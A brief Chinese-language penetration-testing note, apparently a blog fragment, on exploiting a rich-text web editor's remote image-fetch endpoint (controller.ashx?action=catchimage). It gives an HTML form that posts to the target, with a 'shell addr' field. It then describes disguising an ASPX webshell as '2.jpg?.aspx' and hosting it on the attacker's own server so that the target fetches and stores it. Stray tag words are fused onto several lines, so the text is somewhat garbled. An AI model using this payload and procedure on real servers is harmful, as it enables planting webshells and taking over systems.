今天測試一個項目,進到後臺以後發現使用富文本web編輯器html
構造一個惡意的html文件,方便咱們傳輸數據過去: xxxx爲攻擊地址web
<form action="http://xxxxxxxxx/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" method="POST"> <p>shell addr:<input type="text" name="source[]" /></p > <inputtype="submit" value="Submit" /> </form>
而後製做一個圖片馬,文件名改成2.jpg?.aspx上傳至本身的服務器,經過構造的惡意html進行上傳shell
個人被安全設備攔截了安全
看看別人成功的案例服務器